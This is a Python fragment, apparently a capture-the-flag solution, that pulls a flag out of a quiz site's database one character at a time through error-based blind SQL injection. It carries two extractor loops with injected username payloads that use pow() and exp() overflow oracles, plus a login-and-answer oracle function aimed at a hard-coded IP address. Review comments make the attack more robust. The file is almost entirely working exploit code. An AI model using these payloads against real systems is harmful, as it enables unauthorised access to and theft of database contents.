# Error-based blind-SQLi extractor: recovers the flag one character per round.
# Relies on names defined earlier in the file: `chars` (candidate alphabet),
# `url` (endpoint the payload is first POSTed to, presumably registration),
# `result` (flag recovered so far) and the `requests` module.
# `login_and_answer` must already be defined when this loop executes.
for pos in range(1, 50):
    index = str(pos)
    for cand in chars:
        code = ord(cand)
        # Oracle: a correct guess makes IF() return 1 and the query succeeds;
        # a wrong guess evaluates pow(6, 666666666666), which overflows and
        # makes MySQL raise, changing what the application renders.
        username = """decade'or if((ascii(substr((select flag from flag),%s,1))=%s), 1, pow(6,666666666666))#""" % (index, code)
        data = {'username': username, 'password': 'aaa', }
        print(username)
        # Re-send the payload until the server acknowledges it with HTTP 200.
        # NOTE(review): no timeout and no retry cap -- an unreachable target
        # keeps this loop spinning forever.
        acknowledged = False
        while not acknowledged:
            try:
                r = requests.post(url, data=data)
                acknowledged = r.status_code == 200
            except Exception as e:
                print(str(e))
        html = login_and_answer(username)
        # Marker absent => the true branch of IF() ran => this byte matches.
        # NOTE(review): a position where no candidate matches is silently
        # skipped, which misaligns every later character of `result`.
        if 'Your grades is 0' not in html:
            result += chr(code)
            print(result)
            break
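def login_and_answer(username, base_url="http://210.32.4.20", timeout=10, max_retries=None):
    """Log in as *username*, submit one quiz answer and return the answer page.

    This is the oracle of the blind-SQLi loop: the payload carried in
    *username* is evaluated server-side during login, and the caller looks
    for the "Your grades is 0" marker in the HTML returned here.

    Args:
        username: the (payload-carrying) username to log in with.
        base_url: target host.  The original hard-coded this address, so the
            default preserves that behaviour; pass another host to retarget.
        timeout: per-request timeout in seconds.  A stalled connection is now
            retried instead of hanging the extractor indefinitely.
        max_retries: number of failed attempts (exception or non-200 status)
            tolerated before giving up.  None retries forever, which is what
            the original did.

    Returns:
        Body of the answer.php response from the first attempt in which both
        the login POST and the answer POST returned HTTP 200.

    Raises:
        RuntimeError: when *max_retries* attempts have all failed.
    """
    login_url = base_url + "/login.php"
    answer_url = base_url + "/answer.php"
    login_data = {'username': username, 'password': 'aaa', }
    answer_data = {'10.a': 'on'}
    attempts = 0
    while True:
        attempts += 1
        try:
            # Fresh session per attempt so a half-completed login is never
            # reused; the context manager closes the pooled connections that
            # the original left for the garbage collector.
            with requests.Session() as s:
                r1 = s.post(login_url, data=login_data, timeout=timeout)
                r2 = s.post(answer_url, data=answer_data, timeout=timeout)
            if r1.status_code == 200 and r2.status_code == 200:
                return r2.text
        except Exception as e:
            print(str(e))
        if max_retries is not None and attempts >= max_retries:
            raise RuntimeError("login_and_answer: gave up after %d failed attempts" % attempts)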
# Alternate (unused) error-based payload kept for reference: same exp() overflow
# oracle as the loop below, but with LIMIT 0,1 so the subquery yields one row.
# payload = "1' and if((ascii(substr((select flag from flag limit 0,1),1,1))={}),exp(~(select * from(select user())a)),1)#"
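# Second extractor variant (error-based via exp() overflow).  Relies on names
# defined earlier in the file: `guess` (candidate characters), `register_url`,
# `login_url`, `answer_url` and the `requests` module.
REQUEST_TIMEOUT = 10  # seconds; the original had no timeout and could hang forever
flag = ""
for pos in range(1, 50):
    print("round: " + str(pos))
    matched = False
    for cand in guess:
        print("[+]testing: " + cand)
        code = ord(cand)
        # Oracle: a correct guess sends IF() into exp(~(...)), which raises a
        # MySQL DOUBLE-overflow error and changes the grade page that follows.
        payload = "1' and if((ascii(substr((select flag from flag),{},1))={}),exp(~(select * from(select user())a)),1)#"
        injected = payload.format(pos, code)
        print(injected)
        data1 = {"username": injected, "password": "aaa"}
        data2 = {"9.d": "on"}
        # One session per guess: register, log in, then answer.  The session
        # is closed on exit instead of leaking until GC, and it is no longer
        # named `re`, which shadowed the stdlib regex module.
        with requests.session() as sess:
            sess.post(register_url, data=data1, timeout=REQUEST_TIMEOUT)
            sess.post(login_url, data=data1, timeout=REQUEST_TIMEOUT)
            res = sess.post(answer_url, data2, timeout=REQUEST_TIMEOUT)
        if "<script>alert('Your grades is 0');</script>" in res.text:
            flag = flag + cand
            matched = True
            break
    print("flag: " + flag)
    if not matched:
        # No candidate matched this position: either the flag has ended
        # (substr() returns '' and ascii('') is 0) or the character is not
        # in `guess`.  Stop here rather than silently skipping a position,
        # which would misalign every character recovered afterwards.
        print("[-] no candidate matched position " + str(pos) + "; stopping")
        break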